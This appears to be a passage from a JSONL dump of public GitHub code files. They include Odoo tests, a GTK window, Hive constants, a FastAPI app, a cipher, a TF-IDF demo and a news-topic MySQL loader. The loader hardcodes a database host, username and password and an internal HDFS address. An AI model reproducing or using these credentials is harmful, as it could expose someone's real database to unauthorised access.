self.product = self.env['product.product'].create({\n 'type': 'product',\n 'company_id': False,\n 'name': 'Test product',\n 'standard_price': 50,\n 'list_price': 50,\n })\n self.purchase = self.env['purchase.order'].create({\n 'partner_id': self.partner.id,\n })\n line_obj = self.env['purchase.order.line']\n line = line_obj.new({\n 'order_id': self.purchase.id,\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'quantity': 1,\n })\n line.onchange_product_id()\n line_obj.create(line_obj._convert_to_write(line._cache))\n\n def test_set_custom_date_planned(self):\n now = fields.Datetime.now()\n self.purchase.custom_date_planned = now + relativedelta(days=5)\n self.purchase.button_confirm()\n picking = self.purchase.picking_ids[0]\n picking.action_confirm()\n picking.action_assign()\n for move in picking.move_lines:\n move.quantity_done = move.product_uom_qty\n picking.action_done()\n self.assertEquals(len(self.purchase.picking_ids), 1)\n self.assertEquals(len(self.purchase.picking_ids.move_lines), 1)\n self.assertEquals(picking.scheduled_date, now + relativedelta(days=5))\n self.assertEquals(\n picking.move_lines[0].date_expected, now + relativedelta(days=5))\n\n def test_standard_date(self):\n self.purchase.custom_date_planned = False\n self.purchase.button_confirm()\n picking = self.purchase.picking_ids[0]\n picking.action_confirm()\n self.assertEquals(len(self.purchase.picking_ids), 1)\n self.assertEquals(len(self.purchase.picking_ids.move_lines), 1)\n self.assertFalse(self.purchase.custom_date_planned)\n picking.action_assign()\n for move in picking.move_lines:\n move.quantity_done = move.product_uom_qty\n picking.action_done()\n self.assertTrue(picking.scheduled_date)\n self.assertTrue(picking.move_lines[0].date_expected)\n","repo_name":"treytux/trey-addons","sub_path":"purchase_order_stock_picking_date_planned/tests/test_purchase_order_stock_picking_date_planned.py","file_name":"test_purchase_order_stock_picking_date_planned.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"43015417008","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom gi.repository import Gtk, GObject\nimport gtk_helper\nimport serial_helper\nfrom base_window import BaseWindow\nfrom main import APP_NAME\n\n\nclass PortInfoWindow(BaseWindow):\n def __init__(self, parent_window):\n BaseWindow.__init__(self, __file__)\n self.__tree_view = self._builder.get_object(\"trPorts\")\n self._window.set_transient_for(parent_window)\n self._window.set_position(Gtk.WindowPosition.CENTER_ON_PARENT)\n\n self.__add_column(\"Port name\", 0)\n self.__add_column(\"Description\", 1)\n self.__add_column(\"VID:PID\", 2)\n\n self.port_list_store = None\n self.__fill_tree_view()\n\n def __fill_tree_view(self):\n ports = serial_helper.SerialHelper.get_available_ports()\n self.port_list_store = Gtk.ListStore(str, str, str)\n\n for port in ports:\n self.port_list_store.append([port[0], port[1], port[2]])\n\n self.__tree_view.set_model(self.port_list_store)\n\n def __add_column(self, title, column_id):\n column = Gtk.TreeViewColumn(title, Gtk.CellRendererText(), text=column_id)\n column.set_resizable(True)\n column.set_sort_column_id(column_id)\n self.__tree_view.append_column(column)\n\n def on_btnClose_clicked(self, widget):\n self.__on_close()\n\n def __on_close(self):\n self._window.destroy()\n\n def run(self):\n self._window.run()\n self.__on_close()","repo_name":"inflop/pyRsReader","sub_path":"ports_info_window.py","file_name":"ports_info_window.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"41731899649","text":"# -*- coding: utf-8 -*-\n\n###############################################################################\n# constant variables from v1\n###############################################################################\n\n# constants of db start\nDID_INFO_DB_NAME = \"hive_manage_info\"\n\n# for auth collection, must compatible with v1\n# this collection is treated as the temporary one for signin/auth, do not dependent on it for long usage.\nDID_INFO_REGISTER_COL = \"auth_register\"\nUSER_DID = \"userDid\" # added when /auth\nAPP_ID = \"appDid\" # added when /auth\nAPP_INSTANCE_DID = \"appInstanceDid\" # added when /signin\nDID_INFO_NONCE = \"nonce\"\nDID_INFO_TOKEN = \"token\"\nDID_INFO_NONCE_EXPIRED = \"nonce_expired\"\nDID_INFO_TOKEN_EXPIRED = \"token_expired\"\n# auth_register end\n\n# for vault collection, must compatible with v1\nVAULT_SERVICE_COL = \"vault_service\" # collection name\nVAULT_SERVICE_DID = \"did\" # user_did\nVAULT_SERVICE_MAX_STORAGE = \"max_storage\"\nVAULT_SERVICE_FILE_USE_STORAGE = \"file_use_storage\"\nVAULT_SERVICE_DB_USE_STORAGE = \"db_use_storage\"\nVAULT_SERVICE_MODIFY_TIME = \"modify_time\"\nVAULT_SERVICE_START_TIME = \"start_time\"\nVAULT_SERVICE_END_TIME = \"end_time\"\nVAULT_SERVICE_PRICING_USING = \"pricing_using\"\nVAULT_SERVICE_STATE = \"state\" # maybe not exists\n\nVAULT_SERVICE_STATE_RUNNING = \"running\" # read and write\nVAULT_SERVICE_STATE_FREEZE = \"freeze\" # read, but not write\nVAULT_SERVICE_STATE_REMOVED = \"removed\" # soft unsubscribe\n\nVAULT_SERVICE_LATEST_ACCESS_TIME = \"latest_access_time\" # for access checking on database, files, scripting.\n# constants of db end\n\n# for backup server collection\nVAULT_BACKUP_SERVICE_COL = \"vault_backup_service\" # collection name only for v1\nVAULT_BACKUP_SERVICE_USING = \"backup_using\" # pricing name\nVAULT_BACKUP_SERVICE_MAX_STORAGE = \"max_storage\"\nVAULT_BACKUP_SERVICE_USE_STORAGE = \"use_storage\"\nVAULT_BACKUP_SERVICE_START_TIME = \"start_time\"\nVAULT_BACKUP_SERVICE_END_TIME = \"end_time\"\n# end backup server collection\n\n# scripting begin, compatible with v1\nSCRIPTING_SCRIPT_COLLECTION = \"scripts\"\nSCRIPTING_SCRIPT_TEMP_TX_COLLECTION = \"scripts_temptx\"\n\nSCRIPTING_CONDITION_TYPE_QUERY_HAS_RESULTS = \"queryHasResults\"\nSCRIPTING_CONDITION_TYPE_AND = \"and\"\nSCRIPTING_CONDITION_TYPE_OR = \"or\"\n\nSCRIPTING_EXECUTABLE_TYPE_AGGREGATED = \"aggregated\"\nSCRIPTING_EXECUTABLE_TYPE_FIND = \"find\"\nSCRIPTING_EXECUTABLE_TYPE_COUNT = \"count\"\nSCRIPTING_EXECUTABLE_TYPE_INSERT = \"insert\"\nSCRIPTING_EXECUTABLE_TYPE_UPDATE = \"update\"\nSCRIPTING_EXECUTABLE_TYPE_DELETE = \"delete\"\n\nSCRIPTING_EXECUTABLE_TYPE_FILE_UPLOAD = \"fileUpload\"\nSCRIPTING_EXECUTABLE_TYPE_FILE_DOWNLOAD = \"fileDownload\"\nSCRIPTING_EXECUTABLE_TYPE_FILE_PROPERTIES = \"fileProperties\"\nSCRIPTING_EXECUTABLE_TYPE_FILE_HASH = \"fileHash\"\n\nSCRIPTING_EXECUTABLE_CALLER_DID = \"$caller_did\"\nSCRIPTING_EXECUTABLE_CALLER_APP_DID = \"$caller_app_did\"\nSCRIPTING_EXECUTABLE_PARAMS = \"$params\"\nSCRIPTING_EXECUTABLE_DOWNLOADABLE = \"_downloadable\"\n# scripting end\n\nSCRIPT_ANONYMOUS_FILE = '__anonymous_files__'\n\n# @deprecated compatible with v1\n# HIVE_MODE_DEV = \"dev\"\nHIVE_MODE_PROD = \"prod\" # for normal run\nHIVE_MODE_TEST = \"test\" # run on v1 test cases\n\n# for files service\nCHUNK_SIZE = 4096\n\n###############################################################################\n# constant variables added by v2\n###############################################################################\n\nURL_V1 = '/api/v1'\nURL_V2 = '/api/v2'\nURL_SIGN_IN = '/did/signin'\nURL_AUTH = '/did/auth'\nURL_BACKUP_AUTH = '/did/backup_auth'\nURL_SERVER_INTERNAL_BACKUP = '/vault-backup-service/backup'\nURL_SERVER_INTERNAL_RESTORE = '/vault-backup-service/restore'\nURL_SERVER_INTERNAL_STATE = '/vault-backup-service/state'\n\nBACKUP_FILE_SUFFIX = '.backup'\n\nDID = 'did'\nUSR_DID = 'user_did'\nAPP_DID = 'app_did'\nOWNER_ID = 'owner_id'\nCREATE_TIME = 'create_time'\nMODIFY_TIME = 'modify_time'\nSIZE = 'size'\nSTATE = 'state'\nSTATE_RUNNING = 'running'\nSTATE_FINISH = 'finish'\nSTATE_FAILED = 'failed'\nORIGINAL_SIZE = 'original_size'\nIS_UPGRADED = 'is_upgraded'\nCID = 'cid'\nCOUNT = 'count'\nVERSION = 'version'\n\n# for user did and app did relations\nCOL_APPLICATION = 'application'\nCOL_APPLICATION_USR_DID = USR_DID\nCOL_APPLICATION_APP_DID = APP_DID\nCOL_APPLICATION_DATABASE_NAME = 'database_name'\nCOL_APPLICATION_ACCESS_COUNT = 'access_count'\nCOL_APPLICATION_ACCESS_AMOUNT = 'access_amount' # data in and out from app data API\nCOL_APPLICATION_ACCESS_LAST_TIME = 'access_last_time'\nCOL_APPLICATION_STATE = STATE\n# extra: 'created' and 'modified'\nCOL_APPLICATION_STATE_NORMAL = 'normal'\n# COL_APPLICATION_STATE_REMOVED = 'removed'\n\n# for the order collection\nCOL_ORDERS = 'vault_order'\nCOL_ORDERS_SUBSCRIPTION = 'subscription'\nCOL_ORDERS_PRICING_NAME = 'pricing_name'\nCOL_ORDERS_ELA_AMOUNT = 'ela_amount'\nCOL_ORDERS_ELA_ADDRESS = 'ela_address'\nCOL_ORDERS_EXPIRE_TIME = 'expire_time'\nCOL_ORDERS_CONTRACT_ORDER_ID = 'contract_order_id'\nCOL_ORDERS_PROOF = 'proof'\nCOL_ORDERS_STATUS = 'status'\n\nCOL_ORDERS_STATUS_NORMAL = 'normal'\nCOL_ORDERS_STATUS_EXPIRED = 'expired' # not paid\nCOL_ORDERS_STATUS_PAID = 'paid'\nCOL_ORDERS_STATUS_ARCHIVE = 'archive'\n\n# for receipt, contains some fields of order collection\nCOL_RECEIPTS = 'vault_receipt'\nCOL_RECEIPTS_ORDER_ID = 'order_id'\nCOL_RECEIPTS_PAID_DID = 'paid_did'\n# order end\n\n# ipfs_files\nCOL_IPFS_FILES = 'ipfs_files'\nCOL_IPFS_FILES_PATH = 'path'\nCOL_IPFS_FILES_SHA256 = 'sha256'\nCOL_IPFS_FILES_IS_FILE = 'is_file'\nCOL_IPFS_FILES_IPFS_CID = 'ipfs_cid'\nCOL_IPFS_FILES_IS_ENCRYPT = 'is_encrypt'\nCOL_IPFS_FILES_ENCRYPT_METHOD = 'encrypt_method'\n# end of ipfs_files\n\n# ipfs_cid_ref\nCOL_IPFS_CID_REF = 'ipfs_cid_ref'\n# end of ipfs_cid_ref\n\n# collection_metadata\nCOL_COLLECTION_METADATA = '__collection_metadata__'\nCOL_COLLECTION_METADATA_USR_DID = USR_DID\nCOL_COLLECTION_METADATA_APP_DID = APP_DID\nCOL_COLLECTION_METADATA_NAME = 'name'\nCOL_COLLECTION_METADATA_IS_ENCRYPT = 'is_encrypt'\nCOL_COLLECTION_METADATA_ENCRYPT_METHOD = 'encrypt_method'\n# end of collection_metadata\n\n# anonymous_files\nCOL_ANONYMOUS_FILES = '__anonymous_files__'\nCOL_ANONYMOUS_FILES_USR_DID = USR_DID\nCOL_ANONYMOUS_FILES_APP_DID = APP_DID\nCOL_ANONYMOUS_FILES_NAME = 'name'\nCOL_ANONYMOUS_FILES_CID = 'cid'\n# end of anonymous_files\n\nCOL_IPFS_BACKUP_CLIENT = 'ipfs_backup_client'\nCOL_IPFS_BACKUP_SERVER = 'ipfs_backup_server'\n\nBACKUP_TARGET_TYPE = 'type'\nBACKUP_TARGET_TYPE_HIVE_NODE = 'hive_node'\nBACKUP_TARGET_TYPE_GOOGLE_DRIVER = 'google_driver'\n\nBACKUP_REQUEST_ACTION = 'action'\nBACKUP_REQUEST_ACTION_BACKUP = 'backup'\nBACKUP_REQUEST_ACTION_RESTORE = 'restore'\n\nBACKUP_REQUEST_STATE = 'state'\nBACKUP_REQUEST_STATE_STOP = 'stop'\nBACKUP_REQUEST_STATE_PROCESS = 'process'\nBACKUP_REQUEST_STATE_SUCCESS = 'success'\nBACKUP_REQUEST_STATE_FAILED = 'failed'\nBACKUP_REQUEST_STATE_MSG = 'state_msg'\n\nBACKUP_REQUEST_TARGET_HOST = 'target_host'\nBACKUP_REQUEST_TARGET_DID = 'target_did'\nBACKUP_REQUEST_TARGET_TOKEN = 'target_token'\n\n# For backup subscription.\nBKSERVER_REQ_ACTION = 'req_action'\nBKSERVER_REQ_STATE = 'req_state'\nBKSERVER_REQ_STATE_MSG = 'req_state_msg'\nBKSERVER_REQ_CID = 'req_cid'\nBKSERVER_REQ_SHA256 = 'req_sha256'\nBKSERVER_REQ_SIZE = 'req_size'\nBKSERVER_REQ_PUBLIC_KEY = 'public_key'\n\n# @deprecated\nURL_BACKUP_SERVICE = '/api/v2/internal_backup/service'\nURL_BACKUP_FINISH = '/api/v2/internal_backup/finished_confirmation'\nURL_BACKUP_FILES = '/api/v2/internal_backup/files'\nURL_BACKUP_FILE = '/api/v2/internal_backup/file'\nURL_BACKUP_PATCH_HASH = '/api/v2/internal_backup/patch_hash'\nURL_BACKUP_PATCH_DELTA = '/api/v2/internal_backup/patch_delta'\nURL_BACKUP_PATCH_FILE = '/api/v2/internal_backup/patch_file'\nURL_RESTORE_FINISH = '/api/v2/internal_restore/finished_confirmation'\nURL_IPFS_BACKUP_PIN_CIDS = '/api/v2/ipfs-backup-internal/pin_cids'\nURL_IPFS_BACKUP_GET_DBFILES = '/api/v2/ipfs-backup-internal/get_dbfiles'\nURL_IPFS_BACKUP_STATE = '/api/v2/ipfs-backup-internal/state'\n\n\ndef get_unique_dict_item_from_list(dict_list: list) -> list:\n if not dict_list:\n return list()\n return list({frozenset(item.items()): item for item in dict_list}.values())\n","repo_name":"elastos/Elastos.Hive.Node","sub_path":"src/utils/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":8015,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"20816810643","text":"import collections\nfrom typing import List,Optional\nimport copy\nclass Solution:\n def diStringMatch(self, s: str) -> List[int]:\n s+=\"I\"\n l=0\n r=len(s)-1\n ans=[]\n for i in range(len(s)):\n if s[i]==\"D\":\n ans.append(r)\n r-=1\n else:\n ans.append(l)\n l+=1\n return ans","repo_name":"Reigo666/Leetcode","sub_path":"Reigo/leetcode/Python/942. 增减字符串匹配.py","file_name":"942. 增减字符串匹配.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15599402471","text":"import pytest\n\nfrom changelog_gen.cli import util\n\n\n@pytest.mark.parametrize(\n (\"filename\", \"ext\"),\n [\n (\"CHANGELOG.md\", \"md\"),\n (\"CHANGELOG.rst\", \"rst\"),\n (\"CHANGELOG.txt\", None),\n ],\n)\ndef test_detect_extension(filename, ext, cwd):\n f = cwd / filename\n f.write_text(\"changelog\")\n\n assert util.detect_extension() == ext\n","repo_name":"EdgyEdgemond/changelog-gen","sub_path":"tests/cli/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"18963524538","text":"import numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt \n\n# Reading rows containing cities population\ndf = pd.read_excel(\n 'population.xls',\n header = 3,\n skipfooter = 3,\n index_col = 0,\n na_values = '-'\n)\n\n# Reading all cities population including INDONESIA row as an accumulation\ndf2 = pd.read_excel(\n 'population.xls',\n header = 3,\n skipfooter = 2,\n index_col = 0,\n na_values = '-'\n)\n\n# City where citizens is the most in 2010:\ndfMax2010 = df[df[2010] == df[2010].max()]\nnamaMax2010 = dfMax2010.index.values[0] \n\n# City where citizens is the least in 1971:\ndf = df.dropna(subset = [1971]) # dropping cities where value is NaN in 1971\ndfMin1971 = df[df[1971] == df[1971].min()] \nnamaMin1971 = dfMin1971.index.values[0] \n\n# Reading INDONESIA data\ndfindo = df2[df2[2010] == df2[2010].max()] \nnamaindo = dfindo.index.values[0] \n\n\n# Linear Regression\nfrom sklearn.linear_model import LinearRegression\nmodelMax2010 = LinearRegression()\nmodelMin1971 = LinearRegression()\nmodelindo = LinearRegression()\n\n# Training\n# ---- Jawa Barat ---- \nx = dfMax2010.columns.values.reshape(-1, 1)\ny = dfMax2010.values[0]\nmodelMax2010.fit(x, y)\n# ---- Bengkulu ----\nx = dfMin1971.columns.values.reshape(-1, 1)\ny = dfMin1971.values[0]\nmodelMin1971.fit(x, y)\n# ---- INDONESIA ----\nx = dfindo.columns.values.reshape(-1, 1)\ny = dfindo.values[0]\nmodelindo.fit(x, y)\n\n# Prediction of population by 2050\nmax2050 = int(round(modelMax2010.predict([[ 2050 ]])[0]))\nmin2050 = int(round(modelMin1971.predict([[ 2050 ]])[0]))\nindo2050 = int(round(modelindo.predict([[ 2050 ]])[0]))\nprint('Prediction of', namaMax2010, 'population in 2050:', max2050)\nprint('Prediction of', namaMin1971, 'population in 2050:', min2050)\nprint('Prediction of', namaindo, 'population in 2050:', indo2050)\n\n# Plotting\nplt.plot(\n dfMax2010.columns.values, dfMax2010.iloc[0], 'g-',\n)\nplt.plot(\n dfMin1971.columns.values, dfMin1971.iloc[0], 'm-',\n)\nplt.plot(\n dfindo.columns.values, dfindo.iloc[0], 'r-',\n)\n\nplt.scatter(\n dfMax2010.columns.values, dfMax2010.iloc[0], color = 'g', s = 80,\n) \nplt.scatter(\n dfMin1971.columns.values, dfMin1971.iloc[0], color = 'm', s = 80,\n)\nplt.scatter(\n dfindo.columns.values, dfindo.iloc[0], color = 'r', s = 80,\n)\n\n# Plotting Best Fit Line\nplt.plot(\n dfMax2010.columns.values,\n modelMax2010.coef_ * dfMax2010.columns.values + modelMax2010.intercept_,\n 'y-'\n)\nplt.plot(\n dfMin1971.columns.values,\n modelMin1971.coef_ * dfMin1971.columns.values + modelMin1971.intercept_,\n 'y-'\n)\nplt.plot(\n dfindo.columns.values,\n modelindo.coef_ * dfindo.columns.values + modelindo.intercept_,\n 'y-'\n)\n\nplt.legend([namaMax2010, namaMin1971, namaindo])\nplt.title('{} Population (1971-2010)'.format(namaindo))\nplt.xlabel('Year')\nplt.ylabel('Population (hundred million people')\nplt.grid(True)\n\nplt.show()\n\n\n","repo_name":"albert-rian/IndonesiaPopulation_Forecasting_using_Linear_Regression_SKLearn","sub_path":"indonesian.py","file_name":"indonesian.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"43788221818","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom database import DBConnect\nfrom fastapi.encoders import jsonable_encoder\n\n\n\nclass ReadOrDelete(BaseModel):\n name: str\n\nclass CreateOrUpdate(BaseModel):\n name: str\n birthday: str\n\napplication = app = FastAPI()\n\n\n\n@app.post(\"/create\")\nasync def feature(item: CreateOrUpdate):\n\n request = jsonable_encoder(item)\n name = request[\"name\"]\n birthday = request[\"birthday\"]\n dbconn = DBConnect()\n response = dbconn.add_birthday(name, birthday)\n return response\n\n\n@app.post(\"/read\")\nasync def feature(item: ReadOrDelete):\n\n request = jsonable_encoder(item)\n name = request[\"name\"]\n dbconn = DBConnect()\n response = dbconn.read_birthday(name)\n return response\n\n \n@app.post(\"/update\")\nasync def feature(item: CreateOrUpdate):\n\n request = jsonable_encoder(item)\n name = request[\"name\"]\n new_birthday = request[\"birthday\"]\n dbconn = DBConnect()\n response = dbconn.update_birthday(name, new_birthday)\n return response\n \n@app.post(\"/delete\")\nasync def feature(item: ReadOrDelete):\n\n request = jsonable_encoder(item)\n name = request[\"name\"]\n dbconn = DBConnect()\n response = dbconn.delete_birthday(name)\n return response","repo_name":"RobinSrimal/demo-day-1","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16595966613","text":"import pymysql\nimport json\nfrom datetime import datetime\nimport os\nimport pandas as pd\nfrom hdfs import InsecureClient\n\n\n# DB 연결 정보\nclass db_conn:\n host = 'j6a406.p.ssafy.io'\n user = 'newsbig'\n pwd = 'ssafy406!'\n db = 'sinmunmul'\n char = 'utf8'\n\nif __name__ == '__main__':\n # DB를 연결할때 autocommit 부분을 True로 설정해주면, 별도의 커밋없이 자동으로 커밋\n conn = pymysql.connect(host=db_conn.host, user=db_conn.user, password=db_conn.pwd, db=db_conn.db, charset=db_conn.char, autocommit=True)\n curs = conn.cursor(pymysql.cursors.DictCursor)\n curtime = datetime.now().strftime('%Y-%m-%d %H:%M:%2S')\n\n code_num = [264,265,268,266,267,269,259,258,261,771,260,262,310,263,249,250,251,254,252,59,255,256,276,257,241,239,240,237,238,376,242,243,244,248,245,231,232,233,234,322,731,226,227,230,732,283,229,228]\n \n sql = \"UPDATE news_topic SET del_yn=%s WHERE del_yn=%s\" \n curs.execute(sql, ('y','n'))\n\n for code in code_num:\n path = 'topic/output/' + str(code) + \"/part-r-00000\"\n\n # Connecting to Webhdfs by providing hdfs host ip and webhdfs port (9870 by default)\n client_hdfs = InsecureClient('http://172.26.4.211:9870')\n # 사용자 명을 지정하여 연결`\n client_hdfs = InsecureClient('http://172.26.4.211:9870', user='j6a406')\n\n encType = 'utf-8'\n try:\n with client_hdfs.read(path, encoding = encType) as reader:\n data = pd.read_csv(reader, header=None, engine='python', encoding = 'utf-8', on_bad_lines='skip')\n reader.close()\n except pd.errors.EmptyDataError as e:\n continue\n\n list = []\n map = {}\n print(code)\n for k in range(len(data)):\n row = data.iloc[k][0].split(\"\\t\")\n key = row[0]\n times = row[1]\n list.append([key, times])\n\n list.sort(key = lambda x:x[1], reverse=True)\n \n #print(list)\n keyword = list[0][0]+\",\"+list[1][0]+\",\"+list[2][0]+\",\"+list[3][0]+\",\"+list[4][0]\n\n sql = \"INSERT INTO news_topic (code, keyword, del_yn, reg_dt, reg_id, mod_dt, mod_id) values (%s, %s, %s, %s, %s, %s, %s)\"\n try:\n curs.execute(sql, (code, keyword, 'n', curtime, 'admin', curtime, 'admin'))\n except pymysql.err.IntegrityError:\n pass\n","repo_name":"minsang96/Sinmunmul","sub_path":"news_Recommend/topic_to_db.py","file_name":"topic_to_db.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"42161678194","text":"alphabet=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\r\n#direction=input(\"Hey,Type 'encode' to encrypt\")\r\n#direction=input(\"decode' to decrypt\")\r\ntext=input(\"Enter your message\\n\").lower()\r\nshift=int(input(\"Enter the shift number\\n\"))\r\ndef encrypt(plain_text,shift_amount):\r\n cipher_text=\"\"\r\n for letter in plain_text:\r\n position=alphabet.index(letter)\r\n new_position=position+shift_amount\r\n new_letter=alphabet[new_position]\r\n cipher_text+=new_letter\r\n print(f\"The encoded text is {cipher_text}\") \r\ndef decrypt(plain_text,shift_amount):\r\n cipher_text=\"\"\r\n for letter in plain_text:\r\n position=alphabet.index(letter)\r\n new_position=position-shift_amount\r\n new_letter=alphabet[new_position] \r\n cipher_text+=new_letter \r\n print(f\"The Decoded Text is {cipher_text}\")\r\nchoice=int(input(\"1->Encode\\n2->Decode\\n\"))\r\nif choice==1:\r\n encrypt(text,shift)\r\nelse:\r\n decrypt(text,shift) \r\n \r\n \r\n \r\n","repo_name":"Mahesh-Vardhan/Caesar_Cipher","sub_path":"caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70104997882","text":"import numpy as np\nimport scipy.io.wavfile\nfrom aiofsk.modulation import MODULATORS\nfrom aiofsk.baud import DEFAULT_BAUD_OPTIONS\n\n\nasync def write_wav(wav_path: str, data: bytes, baud: int = 300, modulator: str = 'standard', amplitude=1.0):\n modulator = MODULATORS[modulator](\n DEFAULT_BAUD_OPTIONS.make_baud_nt(baud), amplitude\n )\n\n # frame_count = modulator.frame_size * 8 # prepend 8 bits of silence\n frame_count = (modulator.frame_size * 8 * len(data))\n wav_data = np.zeros((frame_count, 1))\n i = 0\n # for _ in range(modulator.frame_size * 8):\n # wav_data[i] = [0.0]\n # i += 1\n\n for character in data:\n for bit in modulator.iter_symbols(character):\n modulated = modulator.modulate_bit(bit)\n for sample in modulated:\n wav_data[i] = sample\n i += 1\n scipy.io.wavfile.write(wav_path, modulator.sample_rate, wav_data)\n\n\nasync def read_wav(wav_path: str, baud: int = 300, modulator: str = 'standard'):\n modulator = MODULATORS[modulator](\n DEFAULT_BAUD_OPTIONS.make_baud_nt(baud)\n )\n\n rate, data = scipy.io.wavfile.read(wav_path)\n\n frame_count = len(data) // modulator.frame_size\n offset = 0\n msg = b''\n with modulator.get_demodulation_context() as demodulate:\n current_byte = 0\n for frame_cnt in range(frame_count):\n frame = np.zeros((modulator.frame_size, 1))\n for i in range(modulator.frame_size):\n frame[i] = data[offset]\n offset += 1\n current_byte += demodulate(frame)\n if frame_cnt > 0 and ((frame_cnt + 1) % 8 == 0):\n msg += current_byte.to_bytes(1, byteorder='little')\n current_byte = 0\n else:\n current_byte <<= 1\n return msg\n","repo_name":"jackrobison/aiofsk","sub_path":"aiofsk/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6415190929","text":"import json\nimport urllib.request\n\nvocab_file = open(\"vocab4.txt\", \"r\", encoding=\"utf8\", errors=\"ignore\")\nvocab_content = vocab_file.readlines()\n\nkhmer_def_pair_arr = []\n\nfor line in vocab_content:\n updated_line = line.replace('\\u200b', '')\n khmer_def_pair = updated_line.rstrip().split('/')\n khmer_def_pair_arr.append(khmer_def_pair)\n\nprint(khmer_def_pair_arr)\n\nfor word in khmer_def_pair_arr:\n\n body_json_update = {\n \"action\": \"updateNoteFields\",\n \"version\": 6,\n \"params\": {\n \"note\": {\n \"id\": word[0],\n \"fields\": {\n \"English\": word[2]\n }\n }\n }\n }\n\n response = json.load(urllib.request.urlopen(\n 'http://localhost:8765', json.dumps(body_json_update).encode('utf-8')))\n print(response)","repo_name":"maxengel99/khmer-anki-automation","sub_path":"utility-scripts/update_def.py","file_name":"update_def.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41708055494","text":"\n# Assignment no:-02\n# Name:-Namrata Bhosale\n# Subject:-NLP\n# Roll no:-08 , Batch:-B1\n# Title:- TFIDF\nimport gensim\nimport pprint\nfrom gensim import corpora\nfrom gensim.utils import simple_preprocess\ndoc_list = [\n \"Hello, how are you?\", \"How do you do?\", \n \"Hey what are you doing? yes you What are you doing?\"\n]\ndoc_tokenized = [simple_preprocess(doc) for doc in doc_list]\ndictionary = corpora.Dictionary()\nBoW_corpus = [dictionary.doc2bow(doc, allow_update=True) for doc in doc_tokenized]\nfor doc in BoW_corpus:\n print([[dictionary[id], freq] for id, freq in doc])\nimport numpy as np\ntfidf = models.TfidfModel(BoW_corpus, smartirs='ntc')\nfor doc in tfidf[BoW_corpus]:\n print([[dictionary[id], np.around(freq,decomal=2)] for id, freq in doc])\n #OUTPUT\n# [['are', 1], ['hello', 1], ['how', 1], ['you', 1]]\n# [['how', 1], ['you', 1], ['do', 2]]\n# [['are', 2], ['you', 3], ['doing', 2], ['hey', 1], ['what', 2], ['yes', 1]]\n# [['are', 0.33], ['hello', 0.89], ['how', 0.33]]\n# [['how', 0.18], ['do', 0.98]]\n# [['are', 0.23], ['doing', 0.62], ['hey', 0.31], ['what', 0.62], ['yes', 0.31]]\n\n# [['are', 1], ['hello', 1], ['how', 1], ['you', 1]]\n# [['how', 1], ['you', 1], ['do', 2]]\n# [['are', 2], ['you', 3], ['doing', 2], ['hey', 1], ['what', 2], ['yes', 1]]\n\n# [['are', 0.33], ['hello', 0.89], ['how', 0.33]]\n# [['how', 0.18], ['do', 0.98]]\n# [['are', 0.23], ['doing', 0.62], ['hey', 0.31], ['what', 0.62], ['yes', 0.31]]","repo_name":"namratabhosale20/NLP_Lab_Na","sub_path":"tfid.py","file_name":"tfid.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37474721795","text":"import sqlite3\n\n\ndef insert_to_db(teams, games, events, sports, athletes, results):\n conn = sqlite3.connect('olympic_history.db')\n cursor = conn.cursor()\n\n # Inserting teams\n for k, v in teams.items():\n team_id = v['id']\n name = v['name']\n noc_name = v['noc_name']\n cursor.execute(\"INSERT INTO TEAMS(ID, NAME, NOC_NAME) VALUES (?, ?, ?)\", (team_id, name, noc_name))\n conn.commit()\n\n # Inserting games\n for key, value in games.items():\n g_id = value['id']\n game_year = value['game_year']\n season = value['season']\n city = value['city']\n cursor.execute(\"INSERT INTO GAMES(ID, YEAR, SEASON, CITY) VALUES(?, ?, ?, ?)\", (g_id, game_year, season, city))\n conn.commit()\n\n # Inserting events\n for v in events.values():\n event_id = v['id']\n event_name = v['event_name']\n cursor.execute(\"INSERT INTO EVENTS(ID, NAME) VALUES (?, ?)\", (event_id, event_name))\n conn.commit()\n\n # Inserting sports\n for value in sports.values():\n sport_id = value['id']\n sport_name = value['name']\n cursor.execute(\"INSERT INTO SPORTS(ID, NAME) VALUES (?, ?)\", (sport_id, sport_name))\n conn.commit()\n\n # Inserting athletes\n for k, v in athletes.items():\n name = v['full_name']\n sex = v['sex']\n params = v['params']\n team_id = v['team_id']\n year_of_birth = v['year_of_birth']\n athlete_id = v['id']\n cursor.execute(\"INSERT INTO ATHLETES(ID, FULL_NAME, 